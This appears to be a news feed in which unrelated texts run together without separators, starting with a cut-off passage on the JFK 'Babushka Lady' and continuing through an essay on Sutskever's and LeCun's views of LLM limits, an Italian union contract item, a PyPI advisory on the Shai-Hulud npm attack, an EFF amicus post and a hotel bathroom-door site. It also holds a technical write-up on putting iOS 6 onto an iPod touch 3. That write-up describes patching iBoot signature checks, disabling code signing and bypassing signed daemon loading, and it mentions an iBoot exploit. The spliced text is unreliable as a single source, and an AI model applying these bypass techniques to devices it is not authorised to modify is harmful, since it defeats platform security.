as wearing a headscarf at Dealey Plaza and speaking of having given the film she shot to two men claiming to be FBI agents.
In March 1979, the Photographic Evidence Panel of the
United States House Select Committee on Assassinations
indicated that they were unable to locate any film attributed to the Babushka Lady.
[
7
]
According to their report: "Initially,
Robert Groden
, a photographic consultant to the committee advised the panel as to pertinent photographic issues and related materials. Committee investigators located many of the suggested films and photographs, however, some items were never located, i.e. the Babushka Lady film, a color photograph by Norman Similas, and the original negative of the Betzner photograph."
[
7
]
Public hearings of the Assassination Records Review Board
On November 18, 1994, assassination researcher Gary Mack testified before the
Assassination Records Review Board
that he had recently been told by an executive in
Kodak
's Dallas office that a woman in her early 30s with brunette hair brought in film purported to be of the assassination scene while they were processing the
Zapruder film
.
[
8
]
According to Mack, the executive said the woman explained to federal investigators already at the film processing office that she ran from Main Street across the grass to Elm Street where she stopped and snapped a photo with some people in the foreground of the
presidential limousine
and the
Texas School Book Depository
.
[
8
]
Mack said that he was told by the Kodak executive that the photo was extremely blurry and "virtually useless" and indicated that the woman likely went home without anyone recording her identity.
[
8
]
After suggesting that the woman in the story may have been the Babushka Lady, Mack then told the Board: "I do not believe that Beverly Oliver is the Babushka Lady, or, let me rephrase that, she certainly could be but the rest of the story is a fabrication."
[
8
]
Also appearing that same day before the ARRB as "Beverly Oliver Massegee", Oliver stated that she was 17 years old at the time of the assassination.
[
8
]
She told the Board that she was filming with an "experimental"
8 mm movie camera
approximately 20 to 30 feet (6 to 9 m) from Kennedy when he was shot and that the film was confiscated by a man who identified himself as an FBI agent.
[
8
]
According to Oliver, she handed over the camera because the man was an authority figure and because she feared being caught in possession of
marijuana
.
[
8
]
Oliver's claims were addressed point by point and debunked by conspiracy theory researcher John McAdams.
[
9
]
When two of the most influential people in AI both say that
today’s large language models are hitting their limits
, it’s worth paying attention.
In a recent long-form interview,
Ilya Sutskever
– co-founder of OpenAI and now head of Safe Superintelligence Inc. – argued that the industry is moving from an
“age of scaling”
to an
“age of research”
. At the same time,
Yann LeCun
, VP & Chief AI Scientist at Meta, has been loudly insisting that
LLMs are not the future of AI at all
and that we need a completely different path based on “world models” and architectures like
JEPA
.
As developers and founders, we’re building products right in the middle of that shift.
This article breaks down Sutskever’s and LeCun’s viewpoints and what they mean for people actually shipping software.
1. Sutskever’s Timeline: From Research → Scaling → Research Again
Sutskever divides the last decade of AI into three phases:
1.1. 2012–2020: The first age of research
This is the era of “try everything”:
convolutional nets for vision
sequence models and attention
early reinforcement learning breakthroughs
lots of small experiments, new architectures, and weird ideas
There
were
big models, but compute and data were still limited. The progress came from
new concepts
, not massive clusters.
1.2. 2020–2025: The age of scaling
Then scaling laws changed everything.
The recipe became:
More data + more compute + bigger models = better results.
You didn’t have to be extremely creative to justify a multi-billion-dollar GPU bill. You could point to a curve: as you scale up parameters and tokens, performance climbs smoothly.
This gave us:
GPT-3/4 class models
state-of-the-art multimodal systems
the current wave of AI products everyone is building on
1.3. 2025 onward: Back to an age of research (but with huge computers)
Now Sutskever is saying that
scaling alone is no longer enough
:
The industry is already operating at
insane scale
.
The internet is finite, so you can’t just keep scraping higher-quality, diverse text forever.
The returns from “just make it 10× bigger” are getting smaller and more unpredictable.
We’re moving into a phase where:
The clusters stay huge, but
progress depends on new ideas
, not only new GPUs.
2. Why the Current LLM Recipe Is Hitting Limits
Sutskever keeps circling three core issues.
2.1. Benchmarks vs. real-world usefulness
Models look god-tier on paper:
they pass exams
solve benchmark coding tasks
reach crazy scores on reasoning evals
But everyday users still run into:
hallucinations
brittle behavior on messy input
surprisingly dumb mistakes in practical workflows
So there’s a gap between
benchmark performance
and
actual reliability
when someone uses the model as a teammate or co-pilot.
2.2. Pre-training is powerful, but opaque
The big idea of this era was: pre-train on enormous text + images and you’ll learn “everything”.
It worked incredibly well… but it has downsides:
you don’t fully control
what
the model learns
when it fails, it’s hard to tell if the issue is data, architecture, or something deeper
pushing performance often means
more of the same
, not better understanding
That’s why there’s so much focus now on
post-training
tricks: RLHF, reward models, system prompts, fine-tuning, tool usage, etc. We’re papering over the limits of the pre-training recipe.
2.3. The real bottleneck: generalization
For Sutskever, the biggest unsolved problem is
generalization
.
Humans can:
learn a new concept from a handful of examples
transfer knowledge between domains
keep learning continuously without forgetting everything
Models, by comparison, still need:
huge amounts of data
careful evals to avoid weird corner-case failures
extensive guardrails and fine-tuning
Even the best systems today
generalize much worse than people
. Fixing that is not a matter of another 10,000 GPUs; it needs new theory and new training methods.
3. Safe Superintelligence Inc.: Betting on New Recipes
Sutskever’s new company,
Safe Superintelligence Inc. (SSI)
, is built around a simple thesis:
scaling was the driver of the last wave
research will drive the next one
SSI is not rushing out consumer products. Instead, it positions itself as:
focused on
long-term research into superintelligence
trying to invent
new training methods and architectures
putting
safety and controllability
at the core from day one
Instead of betting that “GPT-7 but bigger” will magically become AGI, SSI is betting that
a different kind of model
, trained with different objectives, will be needed.
4. Have Tech Companies Overspent on GPUs?
Listening to Sutskever, it’s hard not to read between the lines:
Huge amounts of money have gone into GPU clusters on the assumption that scale alone would keep delivering step-function gains.
We’re discovering that the
marginal gains from scaling
are getting smaller, and progress is less predictable.
That doesn’t mean the GPU arms race was pointless. Without it, we wouldn’t have today’s LLMs at all.
But it does mean:
The next major improvements will likely come from
smarter algorithms
, not merely
more expensive hardware
.
Access to H100s is slowly becoming a
commodity
, while genuine innovation moves back to
ideas and data
.
For founders planning multi-year product strategies, that’s a big shift.
5. Yann LeCun’s Counterpoint: LLMs Aren’t the Future at All
If Sutskever is saying “scaling is necessary but insufficient,”
Yann LeCun
goes further:
LLMs, as we know them, are not the path to real intelligence.
He’s been very explicit about this in talks, interviews and posts.
5.1. What LeCun doesn’t like about LLMs
LeCun’s core criticisms can be summarized in three points:
Limited understanding
LLMs are great at manipulating text but have a
shallow grasp of the physical world
.
They don’t truly “understand” objects, physics or causality – all the things you need for real-world reasoning and planning.
A product-driven dead-end
He sees LLMs as an amazing product technology (chatbots, assistants, coding helpers) but believes they are
approaching their natural limits
.
Each new model is larger and more expensive, yet delivers smaller improvements.
Simplicity of token prediction
Under the hood, an LLM is just predicting the next token. LeCun argues this is a
very narrow, simplistic proxy for intelligence
.
For him, real reasoning can’t emerge from next-word prediction alone.
5.2. World models and JEPA
Instead of LLMs, LeCun pushes the idea of
world models
– systems that:
learn by watching the world (especially video)
build an internal representation of objects, space and time
can
predict what will happen next
in that world, not just what word comes next
One of the architectures he’s working on is
JEPA – Joint Embedding Predictive Architecture
:
it learns representations by predicting future embeddings rather than raw pixels or text
it’s designed to scale to complex, high-dimensional input like video
the goal is a model that can support
persistent memory, reasoning and planning
5.3. Four pillars of future AI
LeCun often describes four pillars any truly intelligent system needs:
Understanding of the physical world
Persistent memory
Reasoning
Planning
His argument is that today’s LLM-centric systems mostly
hack around
these requirements instead of solving them directly. That’s why he’s increasingly focused on world-model architectures instead of bigger text models.
6. Sutskever vs. LeCun: Same Diagnosis, Different Cure
What’s fascinating is that Sutskever and LeCun
agree on the problem
:
current LLMs and scaling strategies are
hitting limits
simply adding more parameters and data is delivering
diminishing returns
new ideas are required
Where they differ is
how radical the change needs to be
:
Sutskever
seems to believe that the next breakthroughs will still come from the same general family of models – big neural nets trained on massive datasets – but with better objectives, better generalization, and much stronger safety work.
LeCun
believes we need a
new paradigm
: world models that learn from interaction with the environment, closer to how animals and humans learn.
For people building on today’s models, that tension is actually good news: it means there is still a lot of frontier left.
7. What All This Means for Developers and Founders
So what should you do if you’re not running an AI lab, but you
are
building products on top of OpenAI, Anthropic, Google, Meta, etc.?
7.1. Hardware is becoming less of a moat
If the next big gains won’t come from simply scaling, then:
the advantage of “we have more GPUs than you” decreases over time
your real edge comes from
use cases, data, UX and integration
, not raw model size
This is good for startups and agencies: you can piggyback on the big models and still differentiate.
7.2. Benchmarks are not your product
Both Sutskever’s and LeCun’s critiques are a warning against obsessing over leaderboards.
Ask yourself:
Does this improvement meaningfully change what my users can do?
Does it reduce hallucinations in
their
workflows?
Does it make the system more reliable, debuggable and explainable?
User-centric metrics matter more than another +2% on some synthetic reasoning benchmark.
7.3. Expect more diversity in model types
If LeCun’s world models, JEPA-style architectures, or other alternatives start to work, we’ll likely see:
specialized models for
physical reasoning and robotics
LLMs acting as a
language interface
over deeper systems that actually handle planning and environment modeling
more hybrid stacks, where multiple models collaborate
For developers, that means learning to
orchestrate multiple systems
instead of just calling one chat completion endpoint.
7.4. Data, workflows and feedback loops are where you win
No matter who is right about the far future, one thing is clear for product builders:
Owning
high-quality domain data
Designing
tight feedback loops
between users and models
Building
evaluations that match your use case
…will matter more than anything else.
You don’t need to solve world modeling or superintelligence yourself. You need to:
pick the right model(s) for the job
wrap them in workflows that make sense for your users
keep improving based on real-world behavior
8. A Quiet Turning Point
In 2019–2021, the story of AI was simple:
“scale is all you need.”
Bigger models, more data, more GPUs.
Now, two of the field’s most influential figures are effectively saying:
scaling is
not enough
(Sutskever)
LLMs themselves may be a
dead end for real intelligence
(LeCun)
We’re entering a new phase where research, theory and new architectures matter again as much as infrastructure.
For builders, that doesn’t mean you should stop using LLMs or pause your AI roadmap. It means:
focus less on chasing the next parameter count
focus more on
how
intelligence shows up inside your product: reliability, reasoning, planning, and how it fits into real human workflows
The GPU race gave us today’s tools. The next decade will be defined by what we
do
with them – and by the new ideas that finally move us beyond “predict the next token.”
Last week Italy’s metal workers secured a major victory as the unions Fim, Fiom and Uilm, all affiliated to IndustriALL Global Union, signed the renewed National Collective Labour Agreement (NCLA) with Federmeccanica and Assistal after four days of continuous and intense negotiations. The agreement covers more than 1.5 million workers across the country and guarantees a €205 (US$237.17) increase in minimum contractual salaries over four years, which the unions say is essential to protecting wages amid rising living costs and economic uncertainty.
In June 2025, FIOM, FIM and UILM
staged an eight-hour strike accompanied
by regional demonstrations across Italy, calling out what they described as the employers’ irresponsible refusal to negotiate. Workers across the sector, including those in small and medium-sized enterprises, joined the strike action and additional measures, such as overtime and flexibility blockades, were enforced. Demonstrations sent a clear and unified message: workers would not accept stagnation, wage erosion or further delays. The strike movement strengthened union resolve and demonstrated to employers that metal workers were mobilized, united and prepared to continue the fight to defend purchasing power and secure fair working conditions.
Union negotiators have described this as a crucial victory that ensures long-term wage defence at a moment when many families are facing mounting financial strain. The revised wage structure maintains a system designed to safeguard purchasing power through inflation. The agreement also includes an additional salary quota and a safeguard clause should inflation surge beyond forecasts during the contract period.
General secretaries Ferdinando Uliano, Michele De Palma and Rocco Palombella, from Fim, Fiom and Uilm, said the contract represents not only a negotiation victory, but also the defence of Italy’s national collective bargaining system itself. They emphasized the unity and resolve of the unions throughout the process:
“It was a very hard negotiation, but we closed the gap and signed a strong contract. We protected the purchasing power of metal workers and strengthened rights and protections. The wage increase, the start of a working-time reduction trial and the stabilization of precarious work were our pillars and we achieved them. Today, we can say we saved the national contract, which has never stopped being challenged. This agreement ensures dignity for those who build the industrial heart of Italy. Metal workers are once again writing the history of this country at a time when it needs stability, courage and lasting solutions.”
The contract delivers significant gains in the fight against job insecurity and precarious work, issues that have been central to the unions’ platform. Employers will now be required to stabilize a share of fixed-term workers after 12 months if they wish to extend temporary contracts under specific conditions. Workers employed through staffing agencies will gain the right to permanent employment at the host company after 48 months, an important shift toward fairer and more secure employment for thousands of metal workers.
The agreement also introduces forward-looking changes, including a structured trial to reduce working hours under the guidance of a dedicated commission. Additional improvements include stronger health and safety protections, expanded rights to workplace training, enhanced safeguards for seriously ill and disabled workers and new provisions specifically aimed at preventing violence against women.
IndustriALL general secretary, Atle Høie, praised the agreement and the determination of the Italian unions:
“This is an important victory not only for metal workers in Italy, but for workers everywhere who are fighting against insecurity, declining wages and the erosion of fundamental rights. By securing real wage protection, pathways to stable employment and groundbreaking progress on working-time reduction, Fim, Fiom and Uilm have shown what strong, united unions can achieve. This agreement sends a clear message: collective bargaining remains one of the most powerful tools workers have to build fairer, safer and more dignified workplaces.”
Earlier this year I
demoed
iOS 6 running on an iPod touch 3 - a device that Apple never gave iOS 6 to, making iOS 5.1.1 the latest build it can run
A few months later I also released a
script
that generates an iOS 6 restore image installable on that iPod touch model
This article describes technical details behind this work. Certain proficiency in iOS internals is assumed
I'll show you what iOS is made of
First of all, let's recap what software components iOS consists of:
iBoot
- the bootloader. Has 4 different types for different scenarios - iBSS, iBEC, LLB and iBoot
Kernelcache
- the OS kernel + kernel extensions (drivers) built into a single binary blob
DeviceTree
- structured list of hardware used by a specific device model + some parameters that specify software behavior. The copy included in an IPSW is more of a template that is heavily modified by iBoot before jumping into the kernel
Userspace filesystem - tiny
restore ramdisk
used purely for OS installation or the actual
root filesystem
of iOS installed persistently
Various firmwares for coprocessors, be they internal or external to the main SoC - like baseband, Wi-Fi, Bluetooth, multitouch, etc.
iPhone 3GS tests
iPhone 3GS was released the same year as iPod touch 3 (2009), and has very similar hardware (
S5L8920X
SoC vs.
S5L8922X
). But the most important part is that it actually got iOS 6 officially
Before doing anything on the iPod I decided to try to boot iOS 6.0 with iOS 5.1.1 iBoot & DeviceTree on the iPhone and see what's gonna break and how
DeviceTree
The most broken thing was DeviceTree - iOS 6 added a lot of new nodes and properties. To fix it in an automated manner I wrote a stupid Python script that decodes and computes a diff between 2 DeviceTrees. Such a diff can also be applied to another DeviceTree
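As a toy illustration of the idea (this is not the actual script from the repo - the dict representation and function names here are just for the sketch), a decoded DeviceTree can be treated as nested nodes and properties and diffed/patched roughly like this:

# Illustrative only: treat a decoded DeviceTree as {node_path: {property: value}}
def devicetree_diff(old, new):
    diff = {"added": {}, "changed": {}, "removed": []}
    for path, props in new.items():
        if path not in old:
            diff["added"][path] = props
        else:
            changed = {k: v for k, v in props.items() if old[path].get(k) != v}
            if changed:
                diff["changed"][path] = changed
    diff["removed"] = [path for path in old if path not in new]
    return diff

def devicetree_apply(tree, diff):
    for path, props in diff["added"].items():
        tree[path] = dict(props)
    for path, props in diff["changed"].items():
        tree.setdefault(path, {}).update(props)
    for path in diff["removed"]:
        tree.pop(path, None)
    return tree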
As I mentioned above, a lot of things in a DeviceTree are filled in by iBoot at runtime. One such new property is
nvram-proxy-data
in
chosen
node
The property must contain a raw NVRAM dump - leaving it empty will make the kernel get stuck somewhere very early
For iPod touch 3 I also had to clean the diff of iPhone-specific things before applying it to the iPod's 5.1.1 DeviceTree
iBoot
iBoot didn't require any major changes in this case. Just typical Image3 signature check patch, boot-args injection and
debug-enabled
patch so the kernel actually respects AMFI boot-args
One important thing is to actually populate
nvram-proxy-data
dynamically, at least for normal boots (aka non-restore). A restore boot will be fine with some random NVRAM hardcoded into the DeviceTree, but a normal one will overwrite your actual NVRAM with the random one if it decides to sync it at some point
I do it by replacing a call to
UpdateDeviceTree()
with my own little function that calls the real
UpdateDeviceTree()
, but also populates actual
nvram-proxy-data
and
random-seed
(this one shouldn't be of any importance)
For boot-args I always add
amfi=0xff
to disable code-signing, but that's pretty canonical as well
Please note that other iBoot+kernel combos might require more changes - if you ever try something and it doesn't work, I recommend looking into DeviceTree differences (both the initial template and how iBoot fills it) and also
boot_args
structure iBoot passes to kernel (not to be confused with boot-args
string
, the
boot_args
structure
is a different thing)
Kernelcache
The most complex part. iPod touch 3 never got iOS 6 officially, yes, but it was rumored that it was initially meant to have it until Apple's marketing team said no. Either way, almost every internal iOS 6 build got both a standalone S5L8922X kernel and even standalone kexts (including ones specific to iPod touch 3)
The question is how to load them all simultaneously. My initial idea was to do it just as older Mac OS X could do - load all kexts dynamically on bootloader level. Long story short, my strategy was the following:
In iBoot context, load all kexts from filesystem - binary itself + Info.plist
Lay them out in memory and add corresponding entries to
chosen/memory-map
node of DeviceTree
Boot standalone kernel which will then pick them up and load
The sad outcome:
panic(cpu 0 caller 0x802e5223): "kern_return_t kxld_link_file(KXLDContext *, u_char *, u_long, const char *, void *, KXLDDependency *, u_int, u_char **, kxld_addr_t *) (com.apple.kec.corecrypto) called in kernel without kxld support"
The kernel has all the code to pick them up, but not to actually link...
Glueing a prelinked kernelcache
So creating a legit kernelcache is the only way after all. I was already imagining all the horrors of writing software to parse and apply
LINKEDIT
and so on, but then it occurred to me! Mac OS X (before Apple Silicon) was generating such kernelcaches somehow! What if we use that logic to build our iOS kernelcache?
I used
/usr/local/bin/kcgen
from an internal Sierra build (it can be found online as "Phoenix A1708.dmg"), but it seems that even the latest macOS
kextcache
can do it (included by default)
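For reference, here is a hypothetical reconstruction of the full invocation, assembled from the options broken down below and expressed as a small Python wrapper; the exact command line may have differed slightly:

# Assumed reconstruction only - built from the flags described in this section
import subprocess

bundle_id_args = []
with open("n18.10A403.kextlist") as f:
    for line in f:
        bundle_id_args += ["--bundle-id", line.strip()]

subprocess.run(
    ["/usr/local/bin/kcgen",
     "-c", "output.bin",
     *bundle_id_args,
     "-arch", "armv7",
     "-all-personalities",
     "-strip-symbols",
     "-uncompressed",
     "--",
     "kernels_kexts_10A63970m/Extensions"],
    check=True)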
Here is a breakdown of the options:
-c output.bin
- output file to write resulting kernelcache to
$(cat n18.10A403.kextlist | sed 's/^/--bundle-id /')
- this weird expression prepends
--bundle-id
to every line from the file at
n18.10A403.kextlist
. This is to specify which kexts we'd like to include. How I created such a list is described below
-arch armv7
- obviously only build armv7 slice
-all-personalities
- very important flag that prevents irrelevant IOKit personalities from being stripped. "Irrelevant" as in "irrelevant to the current machine" - i.e. the Mac running the tool - meaning that without this flag everything relevant to iPod touch 3 would be stripped
-strip-symbols
- strips unnecessary symbols. This flag can be omitted theoretically, but I recommend keeping it to make the resulting kernelcache smaller
-uncompressed
- do not apply compression. Since we'll have to change one little thing later, compression would have to be reapplied anyway
--
means the rest of the args will point to directories to grab kexts from
kernels_kexts_10A63970m/Extensions
is a path to a folder containing kexts
The little thing to do is to remove the fat header. For some reason, kcgen creates a fat Mach-O with a single slice. iBoot doesn't like it, so let's strip it:
lipo -thin armv7 output.bin -o output.thin.bin
The kernelcache is ready now! It just needs to be compressed and packaged into an Image3 container
About kext lists
Once again I compared iPhone 3GS' iOS 5.1.1 vs. 6.0 - some kexts were added, some removed, some changed their bundle IDs, some were irrelevant for iPod touch 3
Do not forget to include the pseudo-extensions as well!
In this specific case I had to patch up Info.plist of the Wi-Fi kext. As always there is a sample in the
repo
Restore ramdisk filesystem
Pretty canonical here. I patched
asr
as usual and also had to move
options.n88.plist
to
options.n18.plist
so it can lay out partitions properly
However, I also have to install the iBoot exploit. To do that I reimplement the
rc.boot
binary:
Remount ramdisk and set
umask
just like the original one does
Call
restored_external
, but with
-server
argument, so it doesn't reboot after finishing restore
If restore was completed properly, I add a third partition, write the exploit there and set
boot-partition
to
2
Reboot the device
My implementation is available guess where? Yes, in the
repository
Root filesystem
This needed a lot of changes:
Add a matching SpringBoard hardware feature plist (
/System/Library/CoreServices/SpringBoard.app/N18AP.plist
in this case)
I took the iOS 5.1.1 variant as a base and added iOS 6 specific capabilities
I tried to keep the Home screen icon order original enough by merging the iPod touch 3 iOS 5.1.1 and iPod touch 4 6.x layouts
Add multitouch & Wi-Fi firmwares
I use versions from 5.1.1
Add Bluetooth firmware and scripts
This is more complicated, as those are all hardcoded into
/usr/sbin/BlueTool
Luckily, they can also be overridden by files in
/etc/bluetool
- as always check my code for reference
I extracted both firmware and scripts from 5.1.1
BlueTool
FairPlay
daemon is limited to
N88AP
(iPhone 3GS)
It has
LimitLoadToHardware
key in its LaunchDaemon plist
But if we simply remove the key, it works on iPod touch 3 as well
This is important, because otherwise we cannot activate the device through Apple's servers
This trick will be harder to pull off on iOS 6.1+, because those versions load LaunchDaemons from a signed cache. It can still be bypassed in many ways - for instance, by patching
launchd
or forcefully loading another plist via
launchctl
DYLD shared cache patches
Product ID map patch
iOS 6 brings the concept of a "product ID" in the form of a long byte sequence
It is filled by iBoot into
product
node of the DeviceTree (a node which didn't even exist before)
I hardcode the value of iPhone 3GS straight into DeviceTree (
8784AE8D7066B0F0136BE91DCFE632A436FFD6FB
)
There is also a short form of this identifier - 16-bit integer - which existed before iOS 6
iPhone 3GS is
0x2714
and the iPod is
0x2715
MobileGestalt
framework has a table that maps the long form to the short one - I swap
0x2714
with
0x2715
there
I believe it's better for iTunes and the like
getDeviceVariant()
patch
MobileGestalt
once again messes up our business
Device variant
is a letter - usually "A" or "B"
It seems to depend on the Wi-Fi transceiver vendor used in the exact device (?)
iOS 6 fails miserably to determine this value for iPod touch 3
This crashes the activation process, for example
To fix it, I patch the function to always return "A" (in the form of a
CFString
)
Fixing code signature
This is much easier than most people think
Shared cache files have the same signature format as normal Mach-Os
And since it's just ad-hoc, all you need to do is recalculate the SHA-1 hashes for the pages you modified and update the signature
So easy, it can be done with just a hex-editor
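As a rough sketch (the 0x1000-byte page size is the typical one here, but the page index and the offset of that page's hash slot inside the signature are inputs you would look up for your particular binary; the function name is just for illustration):

# Sketch: recompute the SHA-1 of one modified page and patch it into the ad-hoc signature
import hashlib

PAGE_SIZE = 0x1000

def refresh_page_hash(image: bytearray, page_index: int, hash_slot_offset: int) -> None:
    page = image[page_index * PAGE_SIZE:(page_index + 1) * PAGE_SIZE]
    image[hash_slot_offset:hash_slot_offset + 20] = hashlib.sha1(page).digest()  # 20-byte SHA-1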
The iBoot exploit
iOS 5 iBoot had a bug in
HFS+
filesystem driver. I did make an exploit many years ago but it was
bad
. Like, truly
bad
. I reimplemented it from scratch for this project making it deterministic (hopefully...)
This subject probably deserves a separate article
Conclusion & future plans
This was not easy to do, and yet easier than I expected initially
After releasing the tool many people asked me about jailbreaking. The old tools are not going to work, but it should be easy to just patch the kernel and drop a Cydia tarball onto the filesystem. I guess I will give it a try later
There was another device that Apple dropped support for that year - iPad 1. I will try that soon enough as well
I hope that the information from this write-up will help you make other crazy combinations, like iOS 4 on iPhone 4S or iOS 5 on iPad mini 1
PyPI and Shai-Hulud: Staying Secure Amid Emerging Threats
An attack on the npm ecosystem continues to evolve, exploiting compromised accounts to publish malicious packages.
This campaign, dubbed
Shai-Hulud
, has targeted large volumes of packages in the JavaScript ecosystem,
exfiltrating credentials to further propagate itself.
PyPI has not been exploited
, however, some PyPI credentials were found exposed in compromised repositories.
We've revoked these tokens as a precaution; there's no evidence they have been used maliciously.
This post raises awareness about the attack and encourages proactive steps to secure your accounts,
especially if you're using build platforms to publish packages to PyPI.
How does this relate to PyPI?
This week, a security researcher disclosed long-lived PyPI credentials exposed as part of the Shai-Hulud campaign.
The credentials were found in GitHub repositories (stored as repository secrets), and were still valid.
We saw an attack exploiting insecure workflow settings with
Ultralytics in 2024
.
While the campaign primarily targets npm, some projects use
monorepo
setups,
publishing both JavaScript packages to npmjs.com and Python packages to PyPI from the same repository.
When attackers compromise these repositories, they can extract credentials for multiple platforms.
We investigated the reported credentials and found they were associated with accounts that hadn't published recently.
We've revoked these credentials and reached out to affected users to advise them to rotate any remaining tokens.
What can I do to protect my PyPI account?
Here are security practices to protect your PyPI account:
Use Trusted Publishing:
If you are using a build platform to publish packages to PyPI,
consider using a
Trusted Publisher
.
This eliminates the need to manage long-lived authentication tokens, reducing the risk of credential exposure.
Trusted Publishing uses short-lived, scoped tokens for each build, minimizing the impact of any potential compromise.
This approach has
risen in popularity
,
with other registries like
Crates.io
,
RubyGems
,
and
npmjs.com
adopting similar models.
When using GitHub Actions, consider layering in additional security measures,
like requiring human approval via
GitHub Environments
before publishing.
This blog post from pyOpenSci
has detailed guidance on adding manual review steps to GitHub Actions workflows.
Audit your workflows for misconfiguration:
Review your GitHub Actions workflows for any potential security issues.
Tools like
zizmor
and
CodeQL
can help identify vulnerabilities in your CI/CD pipelines.
Adopt scanning as an automated action in the repository to catch future issues.
Review your account activity:
Regularly check your PyPI account activity for any unauthorized actions.
If you notice any suspicious activity,
report it to the PyPI security team
immediately.
Taking any of these steps helps mitigate the risk of compromise and keeps packages secure.
EFF to Arizona Federal Court: Protect Public School Students from Surveillance and Punishment for Off-Campus Speech
Electronic Frontier Foundation
www.eff.org
2025-11-26 22:33:54
Legal Intern Alexandra Rhodes contributed to this blog post.
EFF filed an
amicus brief
urging the Arizona District Court to protect public school students’ freedom of speech and privacy by holding that the use of a school-issued laptop or email account does not categorically mean a student is “on campus.” We argued that students need private digital spaces beyond their school’s reach to speak freely, without the specter of constant school surveillance and punishment.
Surveillance Software Exposed a Bad Joke Made in the Privacy of a Student’s Home
The case,
Merrill v. Marana Unified School District
, involves a Marana High School student who, while at home one morning before school started, asked his mother for advice about a bad grade he received on an English assignment. His mother said he should talk to his English teacher, so he opened his school-issued Google Chromebook and started drafting an email. The student then wrote a series of jokes in the draft email that he deleted each time. The last joke stated: “GANG GANG GIMME A BETTER GRADE OR I SHOOT UP DA SKOOL HOMIE,” which he narrated out loud to his mother in a silly voice before deleting the draft and closing his computer.
Within the hour, the student’s mother received a phone call from the school principal, who said that Gaggle surveillance software had flagged a threat from her son and had sent along the screenshot of the draft email. The student’s mother attempted to explain the situation and reassure the principal that there was no threat. Nevertheless, despite her reassurances and the student’s lack of disciplinary record or history of violence, the student was ultimately suspended over the draft email—even though he was physically off campus at the time, before school hours, and had never sent the email.
After the student’s suspension was unsuccessfully challenged, the family
sued the school district
alleging infringement of the student’s right to free speech under the First Amendment and violation of the student’s right to due process under the Fourteenth Amendment.
Public School Students Have Greater First Amendment Protection for Off-Campus Speech
The U.S. Supreme Court has addressed the First Amendment rights of public school students in a
handful of cases
.
Most notably, in
Tinker v. Des Moines Independent Community School District
(1969), the Court held
that students may not be punished for their
on-campus
speech unless the speech “materially and substantially” disrupted the school day or invaded the rights of others.
Decades later, in
Mahanoy Area School District v. B.L. by and through Levy
(2021)
,
in which
EFF filed a brief
,
the Court further held that schools have less leeway to regulate student speech when that speech occurs off campus. Importantly, the Court stated that schools should have a limited ability to punish off-campus speech because “from the student speaker’s perspective, regulations of off-campus speech, when coupled with regulations of on-campus speech, include all the speech a student utters during the full 24-hour day.”
The Ninth Circuit has further held that off-campus speech is only punishable if it bears a “
sufficient nexus
” to the school and poses a credible threat of violence.
In this case, therefore, the extent of the school district’s authority to regulate student speech is tied to whether the high schooler was
on or off campus
at the time of the speech. The student here was at home and thus physically off campus when he wrote the joke in question; he wrote the draft before school hours; and the joke was not emailed to anyone on campus or anyone associated with the campus.
Yet the school district is arguing that his use of a school-issued Google Chromebook and Google Workspace for Education account (including the email account) made his speech—and makes all student speech—automatically “on campus” for purposes of justifying punishment under the First Amendment.
Schools Provide Students with Valuable Digital Tools—But Also Subject Them to Surveillance
EFF supports the plaintiffs’ argument that the student’s speech was “off campus,” did not bear a sufficient nexus to the school, and was not a credible threat. In our amicus brief, we urged the trial court at minimum to
reject
a rule that the use of a school-issued device or cloud account always makes a student’s speech “on campus.”
Our amicus brief supports the plaintiffs’ First Amendment arguments through the lens of surveillance, emphasizing that digital speech and digital privacy are inextricably linked.
As we explained, Marana Unified School District, like many schools and districts across the country, offers students free Google Chromebooks and requires them to have an online Google Account to access the various cloud apps in Google Workspace for Education, including the Gmail app.
Marana Unified School District also uses three surveillance technologies that are integrated into Chromebooks and Google Workspace for Education: Gaggle, GoGuardian, and Securly. These surveillance technologies collectively can monitor virtually everything students do on their laptops and online, from the emails and documents they write (or even just
draft
) to the websites they visit.
School Digital Surveillance Chills Student Speech and Further Harms Students
In our amicus brief, we made four main arguments against a blanket rule that categorizes any use of a school-issued device or cloud account as “on campus,” even if the student is geographically off campus or outside of school hours.
First, we pointed out that such a rule will result in students having no reprieve from school authority, which runs counter to the Supreme Court’s admonition in
Mahanoy
not to regulate “all the speech a student utters during the full 24-hour day.” There must be some place that is “off campus” for public school students even when using digital tools provided by schools, otherwise schools will reach too far into students’ lives.
Second, we urged the court to reject such an “on campus” rule
to mitigate the
chilling effect of digital surveillance
on students’ freedom of speech—that is, the risk that students will self-censor and choose not to express themselves in certain ways or access certain information that may be disfavored by school officials. If students know that no matter where they are or what they are doing with their Chromebooks and Google Accounts, the school is watching
and
the school has greater legal authority to punish them because they are always “on campus,” students will undoubtedly curb their speech.
Third, we argued that such an
“on campus” rule
will
exacerbate existing inequities in public schools
among students of different socio-economic backgrounds. It would
distinctly disadvantage lower-income students who are
more likely to rely on school-issued devices
because their families cannot afford a personal laptop or tablet. This creates a
“pay for privacy” scheme
: lower-income students are subject to greater school-directed surveillance and related discipline for digital speech, while wealthier students can limit surveillance by using personal laptops and email accounts, enabling them to have more robust free speech protections.
Fourth,
such an “on campus” rule will incentivize public schools to continue eroding student privacy by subjecting them to near constant digital surveillance. The student surveillance technologies schools use are notoriously
privacy invasive
and
inaccurate
, causing various harms to students—including unnecessary investigations and discipline, disclosure of sensitive
information, and frustrated learning.
We urge the Arizona District Court to protect public school students’ freedom of speech and privacy by rejecting this approach to school-managed technology
. As we said in our brief, students, especially high schoolers,
need some sphere of digital autonomy, free of surveillance, judgment, and punishment,
as much as anyone else—to express themselves, to develop their identities, to learn and explore, to be silly or crude, and even to make mistakes
.
Bring Back Doors – Bring Bathroom Doors Back to Hotels
I’m done. I’m done arriving at hotels and discovering that they have removed the bathroom door. Something that should be as standard as having a bed has been sacrificed in the name of “aesthetic”.
I get it, you can save on material costs and make the room feel bigger, but what about my dignity??? I can’t save that when you don’t include a bathroom door.
It’s why I’ve built this website, where I compiled hotels that are guaranteed to have bathroom doors, and hotels that need to work on privacy.
I’ve emailed hundreds of hotels and asked them two things: do your doors close all the way, and are they made of glass? Every hotel that says yes to the doors closing and no to them being made of glass has been sorted by price range and city for you to easily find places to stay that are
guaranteed
to have a bathroom door.
Quickly check to see if the hotel you’re thinking of booking has been reported as lacking in doors by a previous guest.
Finally, this passion project could not exist without people submitting hotels without bathroom doors for public shaming. If you’ve stayed at a doorless hotel send me an email with the hotel name to bringbackdoors@gmail.com, or send me a
DM on Instagram
with the hotel name and a photo of the doorless setup to be publicly posted.
Let’s name and shame these hotels to protect the dignity of future travelers.
New ShadowV2 botnet malware used AWS outage as a test opportunity
Bleeping Computer
